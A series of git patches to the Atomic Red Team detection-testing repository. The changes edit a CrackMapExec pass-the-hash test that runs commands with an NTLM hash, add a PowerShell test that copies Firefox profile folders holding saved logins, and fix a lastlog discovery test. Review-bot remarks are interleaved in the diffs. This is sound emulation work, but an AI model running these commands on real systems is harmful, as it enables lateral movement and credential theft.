From be5895136114fe0ad502b3f690b8a333ed296e4d Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 31 Jan 2022 17:51:40 +0100 Subject: [PATCH 01/11] T1550.002 fix test 2 (#1747) * fix test 2 * fix crackmapexec --- atomics/T1550.002/T1550.002.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1550.002/T1550.002.yaml b/atomics/T1550.002/T1550.002.yaml index 8df1f003..6cafb023 100644 --- a/atomics/T1550.002/T1550.002.yaml +++ b/atomics/T1550.002/T1550.002.yaml @@ -75,10 +75,10 @@ atomic_tests: - description: | CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) prereq_command: | - if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } + if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} get_prereq_command: | Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} executor: command: | - crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} + #{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command} name: command_prompt From d2fe61bf557b5092277260567d960b1986f779c7 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 31 Jan 2022 16:52:15 +0000 Subject: [PATCH 02/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 12 ++++-------- atomics/T1550.002/T1550.002.md | 4 ++-- 2 files changed, 6 insertions(+), 10 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b258f7bb..1aa60e72 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -33017,7 +33017,7 @@ defense-evasion: (#{crackmapexec_exe}) ' - prereq_command: 'if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } + prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please 
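Review bot: The new prereq_command still hands `#{crackmapexec_exe}` to Test-Path unquoted, so a path containing spaces is split into several arguments and the check fails even though the file exists; the same applies to the executor line, which now invokes that path directly from command_prompt. Quoting both, `if(Test-Path "#{crackmapexec_exe}") {exit 0} else {exit 1}` and `"#{crackmapexec_exe}" #{domain} -u #{user_name} -H #{ntlm} -x #{command}`, keeps the fix working for any value of the input argument (the argument's default is defined outside the hunk). The switch from writing `0`/`-1` to `exit 0`/`exit 1` looks right, presuming the framework reads the process exit status rather than the command's output.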
@@ -33025,9 +33025,7 @@ defense-evasion: ' executor: - command: 'crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} - -' + command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt T1550.003: technique: @@ -66466,7 +66464,7 @@ lateral-movement: (#{crackmapexec_exe}) ' - prereq_command: 'if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } + prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please @@ -66474,9 +66472,7 @@ lateral-movement: ' executor: - command: 'crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} - -' + command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt T1550.003: technique: diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md index a3e6ce90..5265a8f9 100644 --- a/atomics/T1550.002/T1550.002.md +++ b/atomics/T1550.002/T1550.002.md @@ -96,7 +96,7 @@ command execute with crackmapexec ```cmd -crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} +#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command} ``` @@ -106,7 +106,7 @@ crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} ##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) ##### Check Prereq Commands: ```powershell -if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } +if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell From 58615ef861f2261370a49b04de8c86ad8218a22d Mon Sep 17 00:00:00 2001 
From: Leo Verlod <96517806+Leomon5@users.noreply.github.com> Date: Mon, 31 Jan 2022 10:55:54 -0600 Subject: [PATCH 03/11] Automating getprereqs and fixing prereq errors for T1087.001 Test 5 (#1749) * Automating getprereqs and fixing prereq errors for T1087.001 Test 5 Updating T1087.001 Test 5 to automatically install the login package that contains lastlog, as well as resolving an issue with its prereqs that results in an unexpected eof error. * add original guid back in Co-authored-by: Carrie Roberts --- atomics/T1087.001/T1087.001.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1087.001/T1087.001.yaml b/atomics/T1087.001/T1087.001.yaml index 4137c784..cd7b0c60 100644 --- a/atomics/T1087.001/T1087.001.yaml +++ b/atomics/T1087.001/T1087.001.yaml @@ -85,9 +85,9 @@ atomic_tests: - description: | Check if lastlog command exists on the machine prereq_command: | - if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; + if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; fi get_prereq_command: | - echo "Install lastlog on the machine to run the test."; exit 1; + sudo apt-get install login; exit 1; executor: command: | lastlog > #{output_file} From 87b786fc7e43055a3449afbf0e009683247f1258 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 31 Jan 2022 16:56:12 +0000 Subject: [PATCH 04/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 5 ++--- atomics/T1087.001/T1087.001.md | 4 ++-- 2 files changed, 4 insertions(+), 5 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 1aa60e72..ba6e7972 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
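Review bot: The new get_prereq_command runs `sudo apt-get install login` without `-y`, so on a host where the package is not yet installed apt-get waits for confirmation and a non-interactive prerequisite step hangs or aborts; it also keeps the unconditional `exit 1` from the old placeholder message, so if the runner reads the exit status the step reports failure even after a successful install. Suggest `sudo apt-get install -y login` and dropping the trailing `exit 1`, letting apt-get's own status propagate. Since the command is specific to Debian-derived systems, the dependency description inside the hunk (`Check if lastlog command exists on the machine`) could say so, e.g. `Check if lastlog command exists on the machine (auto-install uses apt-get)`. The `fi` added to prereq_command correctly closes the `if` that produced the unexpected-EOF error mentioned in the commit message.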
@@ -54761,11 +54761,10 @@ discovery: ' prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit - 1; + 1; fi ' - get_prereq_command: 'echo "Install lastlog on the machine to run the test."; - exit 1; + get_prereq_command: 'sudo apt-get install login; exit 1; ' executor: diff --git a/atomics/T1087.001/T1087.001.md b/atomics/T1087.001/T1087.001.md index 5531cd49..64a58541 100644 --- a/atomics/T1087.001/T1087.001.md +++ b/atomics/T1087.001/T1087.001.md @@ -208,11 +208,11 @@ rm -f #{output_file} ##### Description: Check if lastlog command exists on the machine ##### Check Prereq Commands: ```sh -if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; +if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; fi ``` ##### Get Prereq Commands: ```sh -echo "Install lastlog on the machine to run the test."; exit 1; +sudo apt-get install login; exit 1; ``` From 4843c6212a4e0cb9f0299d47136a293826899382 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 31 Jan 2022 20:14:24 +0100 Subject: [PATCH 05/11] Add firefox profile (#1750) --- atomics/T1555.003/T1555.003.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml index 80ab3849..d44f77d3 100644 --- a/atomics/T1555.003/T1555.003.yaml +++ b/atomics/T1555.003/T1555.003.yaml 
@@ -131,3 +131,34 @@ atomic_tests: Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination $env:temp cleanup_command: | Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore +- name: Simulating access to Windows Firefox Login Data + description: | + Simulates an adversary accessing encrypted credentials from firefox web browser's login database. + more info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: | + Firefox must be installed + prereq_command: 'if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1}' + get_prereq_command: | + if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US"}else {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win&lang=en-US"} + $installer = "$env:temp\firefoxsetup.exe" + (New-Object Net.WebClient).DownloadFile($url,$installer) + Start-Process $installer -ArgumentList '/S' -Wait + - description: | + Firefox login data file must exist + prereq_command: 'if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1}' + get_prereq_command: | + if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$firefox="C:\Program Files\Mozilla Firefox\firefox.exe"}else {$firefox="C:\Program Files (x86)\Mozilla Firefox\firefox.exe"} + Start-Process $firefox -ArgumentList '-CreateProfile Atomic' -Wait + Start-Process $firefox -NoNewWindow + Start-Sleep -s 20 + Stop-Process -Name firefox + executor: + name: powershell + command: | + Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force + cleanup_command: | + Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ig \ No newline at end of file 
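Review bot: The cleanup_command is truncated: `Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ig` ends in `Ig` where the Opera test directly above uses `-ErrorAction Ignore`, and the file now ends without a newline; the line should read `Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ignore` followed by a trailing newline. In the second dependency, `Stop-Process -Name firefox` terminates every Firefox process of the current user, not only the one the prerequisite launched; capturing it with `$proc = Start-Process $firefox -NoNewWindow -PassThru` and ending it with `Stop-Process -Id $proc.Id` limits the side effect to what the test itself created. That dependency's description says the login data file must exist, but its prereq_command only tests that the `Profiles` directory exists, so the check passes on a freshly created profile that holds no login database yet; either the wording or the check should be aligned. The first dependency downloads and silently runs an installer with no integrity check on the downloaded file, which is worth stating in its description so users know what the get_prereq step does to the host.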
From 152d4e592638690ba740214e35bae94aa9b0a887 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 31 Jan 2022 19:14:44 +0000 Subject: [PATCH 06/11] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1555.003/T1555.003.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml index d44f77d3..0c283b08 100644 --- a/atomics/T1555.003/T1555.003.yaml +++ b/atomics/T1555.003/T1555.003.yaml @@ -132,6 +132,7 @@ atomic_tests: cleanup_command: | Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore - name: Simulating access to Windows Firefox Login Data + auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c description: | Simulates an adversary accessing encrypted credentials from firefox web browser's login database. more info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index a554610f..7aff52be 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -849,3 +849,4 @@ f7d43d35-d628-4582-bb03-01b1c5e10d11 c510d25b-1667-467d-8331-a56d3e9bc4ff deecd55f-afe0-4a62-9fba-4d1ba2deb321 d239772b-88e2-4a2e-8473-897503401bcc +eb8da98a-2e16-4551-b3dd-83de49baa14c From 6190062a52c0a091d21ae4fb79c2497db20bfe63 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 31 Jan 2022 19:14:49 +0000 Subject: [PATCH 07/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 39 ++++++++++++ atomics/T1555.003/T1555.003.md | 63 +++++++++++++++++++ 6 files changed, 106 insertions(+) 
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 18df7028..7763acf2 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -25,6 +25,7 @@ credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt credential-access,T1555.003,Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell credential-access,T1555.003,Credentials from Web Browsers,5,Simulating access to Opera Login Data,28498c17-57e4-495a-b0be-cc1e36de408b,powershell +credential-access,T1555.003,Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 96bc1346..0c26c68d 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -12,6 +12,7 @@ credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt credential-access,T1555.003,Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell credential-access,T1555.003,Credentials from Web Browsers,5,Simulating access to Opera Login Data,28498c17-57e4-495a-b0be-cc1e36de408b,powershell +credential-access,T1555.003,Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 4c613ce2..f802d2c4 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -39,6 +39,7 @@ - Atomic Test #3: LaZagne - Credentials from Browser [windows] - Atomic Test #4: Simulating access to Chrome Login Data [windows] - Atomic Test #5: Simulating access to Opera Login Data [windows] + - Atomic Test #6: Simulating access to Windows Firefox Login Data [windows] - [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md) - Atomic Test #1: Enumeration for Credentials in Registry [windows] - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 7bc03dd7..21c0c29d 100644 
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -22,6 +22,7 @@ - Atomic Test #3: LaZagne - Credentials from Browser [windows] - Atomic Test #4: Simulating access to Chrome Login Data [windows] - Atomic Test #5: Simulating access to Opera Login Data [windows] + - Atomic Test #6: Simulating access to Windows Firefox Login Data [windows] - [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md) - Atomic Test #1: Enumeration for Credentials in Registry [windows] - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index ba6e7972..b54288eb 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -1524,6 +1524,45 @@ credential-access: Ignore ' + - name: Simulating access to Windows Firefox Login Data + auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c + description: | + Simulates an adversary accessing encrypted credentials from firefox web browser's login database. + more info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: 'Firefox must be installed + +' + prereq_command: if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") + -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit + 0} else {exit 1} + get_prereq_command: | + if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US"}else {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win&lang=en-US"} + $installer = "$env:temp\firefoxsetup.exe" + (New-Object Net.WebClient).DownloadFile($url,$installer) + Start-Process $installer -ArgumentList '/S' -Wait + - description: 'Firefox login data file must exist + +' + prereq_command: if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit + 0} else {exit 1} + get_prereq_command: | + if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$firefox="C:\Program Files\Mozilla Firefox\firefox.exe"}else {$firefox="C:\Program Files (x86)\Mozilla Firefox\firefox.exe"} + Start-Process $firefox -ArgumentList '-CreateProfile Atomic' -Wait + Start-Process $firefox -NoNewWindow + Start-Sleep -s 20 + Stop-Process -Name firefox + executor: + name: powershell + command: 'Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination + $env:temp -Force + +' + cleanup_command: Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction + Ig T1552.002: technique: created: '2020-02-04T12:58:40.678Z' diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md index 5dcb672b..883e3de8 100644 
--- a/atomics/T1555.003/T1555.003.md +++ b/atomics/T1555.003/T1555.003.md @@ -22,6 +22,8 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl - [Atomic Test #5 - Simulating access to Opera Login Data](#atomic-test-5---simulating-access-to-opera-login-data) +- [Atomic Test #6 - Simulating access to Windows Firefox Login Data](#atomic-test-6---simulating-access-to-windows-firefox-login-data) +
@@ -269,4 +271,65 @@ New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login Data" -ItemType F +
+
+ +## Atomic Test #6 - Simulating access to Windows Firefox Login Data +Simulates an adversary accessing encrypted credentials from firefox web browser's login database. +more info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data + +**Supported Platforms:** Windows + + +**auto_generated_guid:** eb8da98a-2e16-4551-b3dd-83de49baa14c + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force +``` + +#### Cleanup Commands: +```powershell +Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ig +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Firefox must be installed +##### Check Prereq Commands: +```powershell +if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US"}else {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win&lang=en-US"} +$installer = "$env:temp\firefoxsetup.exe" +(New-Object Net.WebClient).DownloadFile($url,$installer) +Start-Process $installer -ArgumentList '/S' -Wait +``` +##### Description: Firefox login data file must exist +##### Check Prereq Commands: +```powershell +if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$firefox="C:\Program Files\Mozilla Firefox\firefox.exe"}else {$firefox="C:\Program Files (x86)\Mozilla Firefox\firefox.exe"} +Start-Process $firefox -ArgumentList '-CreateProfile Atomic' -Wait +Start-Process $firefox -NoNewWindow +Start-Sleep -s 20 +Stop-Process -Name firefox +``` + + + +
From 355d170d6210cb53bfa1206056618e3e5d3222eb Mon Sep 17 00:00:00 2001 From: Jose Enrique Hernandez Date: Mon, 31 Jan 2022 15:32:50 -0500 Subject: [PATCH 08/11] added link object, removed comments (#1751) --- .../art-navigator-layer-azure-ad.json | 2 +- .../art-navigator-layer-containers.json | 2 +- .../art-navigator-layer-google-workspace.json | 2 +- .../art-navigator-layer-iaas.json | 2 +- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer-macos.json | 2 +- .../art-navigator-layer-office-365.json | 2 +- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/index.yaml | 4140 ++++++++--------- bin/generate-atomic-docs.rb | 7 +- 11 files changed, 2084 insertions(+), 2081 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json index 42bd9992..0ccf8d24 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json 
@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1484.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"},{"techniqueID":"T1484","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"},{"techniqueID":"T1606.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"},{"techniqueID":"T1606","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) 
MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json index b0e46e00..69180529 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json 
@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Containers)","description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Containers)","description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json index 5cbdb87f..5d57adec 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json 
